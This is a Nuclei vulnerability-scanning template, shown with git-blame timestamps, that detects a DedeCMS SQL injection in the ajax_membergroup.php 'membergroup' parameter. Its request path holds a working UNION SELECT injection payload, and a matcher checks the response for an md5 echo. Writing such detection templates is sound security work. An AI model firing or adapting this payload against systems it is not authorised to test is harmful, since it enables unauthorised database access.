nuclei-templates/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml

31 lines
777 B
YAML
Raw Normal View History

2021-03-15 08:01:47 +00:00
id: dedecms-membergroup-sqli
info:
name: DedeCMS Membergroup SQLI
author: pikpikcu
severity: medium
2021-10-14 12:55:59 +00:00
description: A vulnerability in the DedeCMS product allows remote unauthenticated users to inject arbitrary SQL statements via the 'ajax_membergroup.php' endpoint and the 'membergroup' parameter.
reference:
- http://www.dedeyuan.com/xueyuan/wenti/1244.html
2021-03-15 08:01:47 +00:00
tags: sqli,dedecms
2022-06-30 03:52:06 +00:00
variables:
num: "999999999"
2021-03-15 08:01:47 +00:00
requests:
- method: GET
path:
2022-06-30 03:52:06 +00:00
- "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{num}})+--+@`'`"
2021-03-15 08:01:47 +00:00
matchers-condition: and
matchers:
- type: word
words:
2022-06-30 03:52:06 +00:00
- '{{md5({{num}})}}'
2021-03-15 08:01:47 +00:00
part: body
- type: status
status:
- 200